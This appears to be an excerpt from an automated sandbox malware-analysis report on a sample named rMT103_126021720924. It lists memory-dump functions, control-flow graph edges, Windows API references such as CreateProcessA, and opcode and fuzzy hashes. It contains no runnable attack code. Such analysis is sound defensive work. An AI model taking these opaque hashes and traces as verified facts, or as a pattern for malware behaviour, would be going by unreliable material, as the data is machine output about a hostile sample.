364->365 366 7d3eac9-7d3ead6 364->366 365->363 370 7d3eaf8-7d3eaff 365->370 366->365 370->363 370->372 372->362 380 7d3eb72-7d3eb9a 372->380 381 7d3ebb2-7d3ebb8 380->381 382 7d3eb9c-7d3ebaf 380->382 383 7d3ebba-7d3ebc1 381->383 384 7d3ec28-7d3ec80 381->384 386 7d3ec87-7d3ecdf 383->386 387 7d3ebc7-7d3ebd7 383->387 384->386 391 7d3ece6-7d3edf4 386->391 387->391 392 7d3ebdd-7d3ebe1 387->392 434 7d3ee46-7d3ee9e 391->434 435 7d3edf6-7d3ee06 391->435 395 7d3ebe4-7d3ebe6 392->395 398 7d3ec0b-7d3ec0d 395->398 399 7d3ebe8-7d3ebf8 395->399 401 7d3ec0f-7d3ec19 398->401 402 7d3ec1c-7d3ec25 398->402 407 7d3ebe3 399->407 408 7d3ebfa-7d3ec09 399->408 407->395 408->398 408->407 438 7d3eea5-7d3efb2 434->438 435->438 439 7d3ee0c-7d3ee10 435->439 473 7d3efb4-7d3efc7 438->473 474 7d3efca-7d3efd0 438->474 441 7d3ee13-7d3ee15 439->441 443 7d3ee17-7d3ee27 441->443 444 7d3ee29-7d3ee2b 441->444 443->444 450 7d3ee12 443->450 445 7d3ee3a-7d3ee43 444->445 446 7d3ee2d-7d3ee37 444->446 450->441 475 7d3efd2-7d3efd9 474->475 476 7d3f04a-7d3f0a2 474->476 477 7d3f0a9-7d3f101 475->477 478 7d3efdf-7d3efe3 475->478 476->477 481 7d3f108-7d3f183 477->481 480 7d3efe9-7d3efed 478->480 478->481 483 7d3eff0-7d3effd 480->483 518 7d3f184-7d3f1e8 481->518 490 7d3f022-7d3f02f 483->490 491 7d3efff-7d3f00f 483->491 498 7d3f031-7d3f03b 490->498 499 7d3f03e-7d3f047 490->499 500 7d3f011-7d3f020 491->500 501 7d3efef 491->501 500->490 500->501 501->483 527 7d3f1ea-7d3f20c 518->527 528 7d3f268-7d3f2c0 527->528 529 7d3f20e-7d3f212 527->529 530 7d3f2c7-7d3f3c0 528->530 529->530 531 7d3f218-7d3f21c 529->531 569 7d3f3c2-7d3f3c8 530->569 570 7d3f3d8-7d3f3d9 530->570 533 7d3f21f-7d3f22c 531->533 537 7d3f240-7d3f24d 533->537 538 7d3f22e-7d3f23e 533->538 546 7d3f24f-7d3f259 537->546 547 7d3f25c-7d3f265 537->547 538->537 545 7d3f21e 538->545 545->533 571 7d3f3ca 569->571 572 7d3f3cc-7d3f3ce 569->572 571->570 572->570
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                    • API String ID: 0-3076519024
                                                    • Opcode ID: 3b169b42f2757d8b8e3a4674da915e00cbe5c515be96096ac066b3d0b3cd1ee7
                                                    • Instruction ID: 5718ffd8dfaaa352e038073a866fda776bd3fd91e444ae4d19a6e752f8032c68
                                                    • Opcode Fuzzy Hash: 3b169b42f2757d8b8e3a4674da915e00cbe5c515be96096ac066b3d0b3cd1ee7
                                                    • Instruction Fuzzy Hash: 92629C71B002158FDB59EB79C85466EBBA6FFC8310F248569E04ADB3A4CE34DC46C7A1
                                                    Function 07D3B47A Relevance: 1.8, Strings: 1, Instructions: 592COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 886 7d3b47a 887 7d3b47c-7d3b47d 886->887 888 7d3b472 887->888 889 7d3b47f-7d3b484 887->889 890 7d3b474-7d3b476 888->890 891 7d3b4ef-7d3b4f8 call 7d3892c 888->891 892 7d3b486-7d3b4d9 call 7d33b94 889->892 893 7d3b45a-7d3b471 889->893 890->886 896 7d3b4fd-7d3b509 891->896 911 7d3b4df-7d3b4eb call 7d33ba4 892->911 912 7d3b58d-7d3b5b8 892->912 893->888 899 7d3b50f-7d3b51a call 7d3a3b8 896->899 903 7d3b51f-7d3b525 call 7d33bc4 899->903 905 7d3b52a-7d3b531 call 7d33bd4 903->905 909 7d3b536-7d3b549 905->909 917 7d3b551-7d3b562 call 7d33be4 909->917 911->891 918 7d3b5bf-7d3b628 911->918 912->918 921 7d3b567-7d3b56d 917->921 932 7d3bae2-7d3bb07 918->932 933 7d3b62e-7d3b632 918->933 924 7d3b573-7d3b57d call 7d33bf4 921->924 928 7d3b582-7d3b58c 924->928 935 7d3bb0e-7d3bb39 932->935 934 7d3b638-7d3b64e 933->934 933->935 937 7d3b650-7d3b65a 934->937 938 7d3b67c-7d3b688 934->938 952 7d3bb40-7d3bbdb 935->952 937->938 945 7d3b65c-7d3b666 937->945 943 7d3b6fa-7d3b704 938->943 944 7d3b68a-7d3b69c 938->944 950 7d3b722-7d3b741 call 7d369a0 943->950 951 7d3b706-7d3b717 943->951 947 7d3b6be-7d3b6ca 944->947 948 7d3b69e-7d3b6a2 944->948 945->952 953 7d3b66c-7d3b676 945->953 966 7d3b6ec-7d3b6f4 947->966 967 7d3b6cc-7d3b6d0 947->967 956 7d3bbe2-7d3bc0d 948->956 957 7d3b6a8-7d3b6ac 948->957 964 7d3b743 950->964 965 7d3b749-7d3b753 950->965 951->950 952->956 953->938 953->952 973 7d3bc14-7d3bc3f 956->973 957->947 959 7d3b6ae-7d3b6b8 957->959 959->947 959->956 964->965 969 7d3bc46-7d3bcb9 964->969 970 7d3b771-7d3b77c 965->970 971 7d3b755-7d3b766 965->971 966->943 972 7d3b6d6-7d3b6da 967->972 967->973 1010 7d3bcc0-7d3bcf3 969->1010 981 7d3b782-7d3b788 call 7d3893c 970->981 971->970 972->966 976 7d3b6dc-7d3b6e6 972->976 973->969 976->966 976->973 987 7d3b78d-7d3b797 981->987 989 7d3b7b5-7d3b7cb 987->989 990 7d3b799-7d3b7aa 987->990 997 7d3b7d1-7d3b7d5 989->997 998 7d3bada-7d3bae1 989->998 990->989 1001 7d3b7e3 997->1001 1002 7d3b7d7-7d3b7e1 997->1002 1004 7d3b7e5-7d3b7f0 1001->1004 1002->1004 1004->1010 1011 7d3b7f6-7d3b80b 1004->1011 1020 7d3b858-7d3b862 1011->1020 1021 7d3b80d-7d3b817 1011->1021 1025 7d3b880-7d3b89a 1020->1025 1026 7d3b864-7d3b875 1020->1026 1021->1020 1024 7d3b819-7d3b823 1021->1024 1028 7d3b841-7d3b850 1024->1028 1029 7d3b825-7d3b836 1024->1029 1034 7d3b9b4-7d3b9be 1025->1034 1026->1025 1028->1020 1029->1028 1037 7d3b9c0-7d3b9d1 1034->1037 1038 7d3b9dc-7d3b9f3 1034->1038 1037->1038 1041 7d3b9f9 1038->1041 1042 7d3b89f-7d3b8a9 1038->1042 1041->998 1043 7d3b8c7-7d3b8e1 1042->1043 1044 7d3b8ab-7d3b8bc 1042->1044 1047 7d3b8e3-7d3b8ed 1043->1047 1048 7d3b8f5-7d3b903 1043->1048 1044->1043 1047->1048 1051 7d3b9b1 1048->1051 1052 7d3b909-7d3b91f 1048->1052 1051->1034 1055 7d3b921-7d3b927 1052->1055 1056 7d3b937-7d3b93d 1052->1056 1057 7d3b92b-7d3b92d 1055->1057 1058 7d3b929 1055->1058 1059 7d3b951-7d3b969 call 7d369c0 1056->1059 1060 7d3b93f-7d3b949 1056->1060 1057->1056 1058->1056 1064 7d3b982-7d3b98a 1059->1064 1065 7d3b96b-7d3b97c 1059->1065 1060->1059 1066 7d3b9a1-7d3b9a9 1064->1066 1067 7d3b98c-7d3b99b 1064->1067 1065->1064 1066->1051 1067->1066
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: e007e3fe8d0de038b4b23d49d07265d7f59a9bcb3f9208a24efceef14fa3e87d
                                                    • Instruction ID: 8aa54bd4a5371b39db66d83ee56ac67123d15bb7e2a4bb6965d968dc1846ca1d
                                                    • Opcode Fuzzy Hash: e007e3fe8d0de038b4b23d49d07265d7f59a9bcb3f9208a24efceef14fa3e87d
                                                    • Instruction Fuzzy Hash: B03214B0B002058FDB59EF68C498A6DBBB2FF89300F1585A9E4499B3A5DB34EC45CB50
                                                    Function 07D32106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1071 7d32106-7d3210a 1072 7d3210b-7d32120 1071->1072 1073 7d32acd-7d32adf 1071->1073 1072->1073 1074 7d32121-7d3212c 1072->1074 1076 7d32132-7d3213e 1074->1076 1077 7d3214a-7d32159 1076->1077 1079 7d321b8-7d321bc 1077->1079 1080 7d321c2-7d321cb 1079->1080 1081 7d32264-7d322ce 1079->1081 1082 7d321d1-7d321e7 1080->1082 1083 7d320c6-7d320d2 1080->1083 1081->1073 1119 7d322d4-7d3281b 1081->1119 1089 7d32239-7d3224b 1082->1089 1090 7d321e9-7d321ec 1082->1090 1083->1073 1085 7d320d8-7d320e4 1083->1085 1087 7d320e6-7d320fa 1085->1087 1088 7d3215b-7d32161 1085->1088 1087->1088 1096 7d320fc-7d32105 1087->1096 1088->1073 1091 7d32167-7d3217f 1088->1091 1100 7d32251-7d32261 1089->1100 1101 7d32a0c-7d32ac2 1089->1101 1090->1073 1094 7d321f2-7d3222f 1090->1094 1091->1073 1099 7d32185-7d321ad 1091->1099 1094->1081 1115 7d32231-7d32237 1094->1115 1096->1071 1099->1079 1101->1073 1115->1089 1115->1090 1197 7d32832-7d328c5 1119->1197 1198 7d3281d-7d32827 1119->1198 1199 7d328d0-7d32963 1197->1199 1198->1199 1200 7d3282d 1198->1200 1201 7d3296e-7d32a01 1199->1201 1200->1201 1201->1101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D
                                                    • API String ID: 0-2746444292
                                                    • Opcode ID: 45959da813de7810ba48f862053d3ca6c368f98cf15a4333b67e94b33b9823db
                                                    • Instruction ID: 86ca1908960263176dbc7bb4cb09b47cdea4ec75c5905a922b39237e4ec30b9a
                                                    • Opcode Fuzzy Hash: 45959da813de7810ba48f862053d3ca6c368f98cf15a4333b67e94b33b9823db
                                                    • Instruction Fuzzy Hash: 2352CA74A002298FDB55DF28D998A9DBBB6FF89300F1081D9D509A73A5CB35AE81CF50
                                                    Function 07D36CE8 Relevance: .7, Instructions: 668COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecd50acd425b19604ef9a4e2d2cbff0019e08af6db72a9f2eb75c7d02a94aac7
                                                    • Instruction ID: 6d71ec3eef2e4eb7a4e9b5084ff60fe9a68885a125f51e15366ed5351813c9b2
                                                    • Opcode Fuzzy Hash: ecd50acd425b19604ef9a4e2d2cbff0019e08af6db72a9f2eb75c7d02a94aac7
                                                    • Instruction Fuzzy Hash: 485228B0600605CFCB54DF68C588A9DB7F2FF89314F2585A8E44A9B365DB31EC86CB90
                                                    Function 07D36CD8 Relevance: .3, Instructions: 291COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2da78c54ecf7a5cafb9acec87121f6ef185bc015a3fae0794c285ec38ed7b95
                                                    • Instruction ID: 00ae064ec23eedfebf6410604ebe9f3dd9d3857699dc9a4b230eaada50605df6
                                                    • Opcode Fuzzy Hash: c2da78c54ecf7a5cafb9acec87121f6ef185bc015a3fae0794c285ec38ed7b95
                                                    • Instruction Fuzzy Hash: 26D1D3B4A00605CFDB54CF58C588AA9F7F2FF45315F6981A9E449AB261DB31EC86CB40
                                                    Function 01397000 Relevance: .2, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5034f58c7daf16c508acce65b70db1364cf75770c7aeab0903ab0a848200367a
                                                    • Instruction ID: bac3ac657b4a62942f44eaf1daa583e4b4c065003049809b74837125d2ec474b
                                                    • Opcode Fuzzy Hash: 5034f58c7daf16c508acce65b70db1364cf75770c7aeab0903ab0a848200367a
                                                    • Instruction Fuzzy Hash: 2491B274E002199FDB55DFA9D880AEDBBB2FF88300F10816AE449AB364DB355D46CF50
                                                    Function 0139703A Relevance: .2, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3143e36b643820a7c623afb16fe1bd3b0b52ee96a2f5c7f1453d976b71c59fb3
                                                    • Instruction ID: 9411ed4798ec61ed20438b95cd1bc6ec725aea97b1eec4464cbb2de973f20bb6
                                                    • Opcode Fuzzy Hash: 3143e36b643820a7c623afb16fe1bd3b0b52ee96a2f5c7f1453d976b71c59fb3
                                                    • Instruction Fuzzy Hash: C791A074E002189FDB19DFA9D890ADDBBF2FF88300F14816AE449AB364DB355946CF50
                                                    Function 01393E34 Relevance: .2, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c86d4b70b8ef1ac8b9e7c5f78157bfd71e69709f92507ae9df5a6b4a210eba46
                                                    • Instruction ID: 4fe48f8598a52c9d116413e24738fb1f858d0dc097ef645426d00a2fa6b520a4
                                                    • Opcode Fuzzy Hash: c86d4b70b8ef1ac8b9e7c5f78157bfd71e69709f92507ae9df5a6b4a210eba46
                                                    • Instruction Fuzzy Hash: 88819074E002189FDF19DFA9D990ADEBBB2FF88300F14806AE449AB364DB355946CF50
                                                    Function 0139D530 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 573 139d530-139d5cf GetCurrentProcess 577 139d5d8-139d60c GetCurrentThread 573->577 578 139d5d1-139d5d7 573->578 579 139d60e-139d614 577->579 580 139d615-139d649 GetCurrentProcess 577->580 578->577 579->580 582 139d64b-139d651 580->582 583 139d652-139d66d call 139d70f 580->583 582->583 585 139d673-139d6a2 GetCurrentThreadId 583->585 587 139d6ab-139d70d 585->587 588 139d6a4-139d6aa 585->588 588->587
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0139D5BE
                                                    • GetCurrentThread.KERNEL32 ref: 0139D5FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0139D638
                                                    • GetCurrentThreadId.KERNEL32 ref: 0139D691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: eb3e23d873bb5ad65f22a85e9ff49a1a32606134e6fcb3b1e4aca7e0b047d853
                                                    • Instruction ID: 85feb701ea98c37acc507b0bcf298b65b597778104ba47f8f13dd97cd7be2d15
                                                    • Opcode Fuzzy Hash: eb3e23d873bb5ad65f22a85e9ff49a1a32606134e6fcb3b1e4aca7e0b047d853
                                                    • Instruction Fuzzy Hash: 7C5174B0901249CFDB15CFAAD548BDEBBF1BB48318F24C469E049AB3A1D7749884CF65
                                                    Function 0139D540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 595 139d540-139d5cf GetCurrentProcess 599 139d5d8-139d60c GetCurrentThread 595->599 600 139d5d1-139d5d7 595->600 601 139d60e-139d614 599->601 602 139d615-139d649 GetCurrentProcess 599->602 600->599 601->602 604 139d64b-139d651 602->604 605 139d652-139d66d call 139d70f 602->605 604->605 607 139d673-139d6a2 GetCurrentThreadId 605->607 609 139d6ab-139d70d 607->609 610 139d6a4-139d6aa 607->610 610->609
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0139D5BE
                                                    • GetCurrentThread.KERNEL32 ref: 0139D5FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0139D638
                                                    • GetCurrentThreadId.KERNEL32 ref: 0139D691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 01031f42b3ee5ebea18569b8d6618dfd205ac96336c2d88519f2a576a26f2487
                                                    • Instruction ID: ac28f91fbdbe06dd6c59ab2177e1b3d9751f08fa6943d6178bfb1983968496d0
                                                    • Opcode Fuzzy Hash: 01031f42b3ee5ebea18569b8d6618dfd205ac96336c2d88519f2a576a26f2487
                                                    • Instruction Fuzzy Hash: 345155B0900249CFDB15DFAAD548BDEBBF1FB48318F208469E049A73A1D7349984CF65
                                                    Function 07D3D570 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 687 7d3d570-7d3d5b6 690 7d3d979-7d3d9a4 687->690 691 7d3d5bc-7d3d5cf 687->691 703 7d3d9ab-7d3d9fb 690->703 694 7d3d5e3-7d3d609 691->694 695 7d3d5d1-7d3d5db 691->695 694->703 704 7d3d60f-7d3d625 call 7d3cd34 694->704 695->694 734 7d3d9fd-7d3da09 703->734 735 7d3da1c-7d3da24 703->735 709 7d3d707-7d3d70b 704->709 710 7d3d62b-7d3d645 704->710 711 7d3d71b-7d3d72b call 7d3cd44 709->711 712 7d3d70d-7d3d713 709->712 717 7d3d647-7d3d655 710->717 718 7d3d65d-7d3d679 710->718 719 7d3d762-7d3d780 call 7d3cd54 711->719 720 7d3d72d-7d3d756 711->720 712->711 717->718 732 7d3d6d6-7d3d6fa 718->732 733 7d3d67b-7d3d686 718->733 730 7d3d785-7d3d79c call 7d3a3b8 719->730 741 7d3d7b4-7d3d7d0 730->741 742 7d3d79e-7d3d7ac 730->742 746 7d3d704 732->746 747 7d3d6fc 732->747 743 7d3d688-7d3d68e 733->743 744 7d3d69e-7d3d6af 733->744 751 7d3da11 734->751 758 7d3d7d2-7d3d7dd 741->758 759 7d3d844-7d3d868 741->759 742->741 748 7d3d692-7d3d694 743->748 749 7d3d690 743->749 754 7d3d6b1-7d3d6b4 744->754 755 7d3d6b6-7d3d6b9 744->755 746->709 747->746 748->744 749->744 751->735 756 7d3d6bc-7d3d6d4 754->756 755->756 756->732 756->733 763 7d3d7f5-7d3d802 758->763 764 7d3d7df-7d3d7e5 758->764 771 7d3d872 759->771 772 7d3d86a 759->772 769 7d3d816-7d3d842 call 7d33b64 763->769 770 7d3d804-7d3d810 763->770 767 7d3d7e7 764->767 768 7d3d7e9-7d3d7eb 764->768 767->763 768->763 769->758 769->759 770->769 771->690 772->771
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1722350181.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d30000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q$PH^q
                                                    • API String ID: 0-1598597984
                                                    • Opcode ID: d368ef9e1bc031c22f035880aa196b6ef36145b314dbc719010ffe21ab160b5d
                                                    • Instruction ID: ee01ca4e0b223ffb6ad61d231da0200f4710b12d2d81743653ba99982879da72
                                                    • Opcode Fuzzy Hash: d368ef9e1bc031c22f035880aa196b6ef36145b314dbc719010ffe21ab160b5d
                                                    • Instruction Fuzzy Hash: 4EC102B4B102098FCB14DF68C598A99BBF2FF89311F2545A8E456AB3A1DB31EC45CF50
                                                    Function 058AEA44 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1226 58aea44-58aeae5 1228 58aeb1e-58aeb3e 1226->1228 1229 58aeae7-58aeaf1 1226->1229 1236 58aeb40-58aeb4a 1228->1236 1237 58aeb77-58aeba6 1228->1237 1229->1228 1230 58aeaf3-58aeaf5 1229->1230 1231 58aeb18-58aeb1b 1230->1231 1232 58aeaf7-58aeb01 1230->1232 1231->1228 1234 58aeb03 1232->1234 1235 58aeb05-58aeb14 1232->1235 1234->1235 1235->1235 1239 58aeb16 1235->1239 1236->1237 1238 58aeb4c-58aeb4e 1236->1238 1245 58aeba8-58aebb2 1237->1245 1246 58aebdf-58aec99 CreateProcessA 1237->1246 1240 58aeb50-58aeb5a 1238->1240 1241 58aeb71-58aeb74 1238->1241 1239->1231 1243 58aeb5e-58aeb6d 1240->1243 1244 58aeb5c 1240->1244 1241->1237 1243->1243 1247 58aeb6f 1243->1247 1244->1243 1245->1246 1248 58aebb4-58aebb6 1245->1248 1257 58aec9b-58aeca1 1246->1257 1258 58aeca2-58aed28 1246->1258 1247->1241 1250 58aebb8-58aebc2 1248->1250 1251 58aebd9-58aebdc 1248->1251 1252 58aebc6-58aebd5 1250->1252 1253 58aebc4 1250->1253 1251->1246 1252->1252 1255 58aebd7 1252->1255 1253->1252 1255->1251 1257->1258 1268 58aed2a-58aed2e 1258->1268 1269 58aed38-58aed3c 1258->1269 1268->1269 1270 58aed30 1268->1270 1271 58aed3e-58aed42 1269->1271 1272 58aed4c-58aed50 1269->1272 1270->1269 1271->1272 1273 58aed44 1271->1273 1274 58aed52-58aed56 1272->1274 1275 58aed60-58aed64 1272->1275 1273->1272 1274->1275 1276 58aed58 1274->1276 1277 58aed76-58aed7d 1275->1277 1278 58aed66-58aed6c 1275->1278 1276->1275 1279 58aed7f-58aed8e 1277->1279 1280 58aed94 1277->1280 1278->1277 1279->1280 1282 58aed95 1280->1282 1282->1282
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058AEC86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: c447414440d998e3b7292e87af837280f2628a28931570944549b3989997ded3
                                                    • Instruction ID: a24140a27542aac87ab312257a1aff60e9651e30e9e78b54f055ed27604fd266
                                                    • Opcode Fuzzy Hash: c447414440d998e3b7292e87af837280f2628a28931570944549b3989997ded3
                                                    • Instruction Fuzzy Hash: 65A17A72D002599FEB20CFA8C845BEDBBB6BF48314F1485A9E849F7240DB749985CF91
                                                    Function 058AEA50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1283 58aea50-58aeae5 1285 58aeb1e-58aeb3e 1283->1285 1286 58aeae7-58aeaf1 1283->1286 1293 58aeb40-58aeb4a 1285->1293 1294 58aeb77-58aeba6 1285->1294 1286->1285 1287 58aeaf3-58aeaf5 1286->1287 1288 58aeb18-58aeb1b 1287->1288 1289 58aeaf7-58aeb01 1287->1289 1288->1285 1291 58aeb03 1289->1291 1292 58aeb05-58aeb14 1289->1292 1291->1292 1292->1292 1296 58aeb16 1292->1296 1293->1294 1295 58aeb4c-58aeb4e 1293->1295 1302 58aeba8-58aebb2 1294->1302 1303 58aebdf-58aec99 CreateProcessA 1294->1303 1297 58aeb50-58aeb5a 1295->1297 1298 58aeb71-58aeb74 1295->1298 1296->1288 1300 58aeb5e-58aeb6d 1297->1300 1301 58aeb5c 1297->1301 1298->1294 1300->1300 1304 58aeb6f 1300->1304 1301->1300 1302->1303 1305 58aebb4-58aebb6 1302->1305 1314 58aec9b-58aeca1 1303->1314 1315 58aeca2-58aed28 1303->1315 1304->1298 1307 58aebb8-58aebc2 1305->1307 1308 58aebd9-58aebdc 1305->1308 1309 58aebc6-58aebd5 1307->1309 1310 58aebc4 1307->1310 1308->1303 1309->1309 1312 58aebd7 1309->1312 1310->1309 1312->1308 1314->1315 1325 58aed2a-58aed2e 1315->1325 1326 58aed38-58aed3c 1315->1326 1325->1326 1327 58aed30 1325->1327 1328 58aed3e-58aed42 1326->1328 1329 58aed4c-58aed50 1326->1329 1327->1326 1328->1329 1330 58aed44 1328->1330 1331 58aed52-58aed56 1329->1331 1332 58aed60-58aed64 1329->1332 1330->1329 1331->1332 1333 58aed58 1331->1333 1334 58aed76-58aed7d 1332->1334 1335 58aed66-58aed6c 1332->1335 1333->1332 1336 58aed7f-58aed8e 1334->1336 1337 58aed94 1334->1337 1335->1334 1336->1337 1339 58aed95 1337->1339 1339->1339
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058AEC86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d2b459e8153837d7df1a5c6639cb9faadb5a3470328836bb1cf13d4b4ee8d807
                                                    • Instruction ID: 19326af8ee99ab5dd0d434d2724cd19b137f02579576d4cebd4ed88c900ea139
                                                    • Opcode Fuzzy Hash: d2b459e8153837d7df1a5c6639cb9faadb5a3470328836bb1cf13d4b4ee8d807
                                                    • Instruction Fuzzy Hash: 07917A72D002599FEB20CFA8C845BEDBBB6BF48314F1485A9E849F7240DB749985CF91
                                                    Function 0139B298 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0139B4FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1390000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f35df316c724c827dafa1343ca263c708f339df2af668e64c7abf0017ba9de33
                                                    • Instruction ID: 0d290469eaa71ffdaf235a6c204bd38ba69ca021a9b158898d19892b9d29435f
                                                    • Opcode Fuzzy Hash: f35df316c724c827dafa1343ca263c708f339df2af668e64c7abf0017ba9de33
                                                    • Instruction Fuzzy Hash: 24813870A00B058FDB25DF2AD584B9ABBF1FF88308F108A2DD486D7A54D734E945CB90
                                                    Function 01394508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013959E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1717847206.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
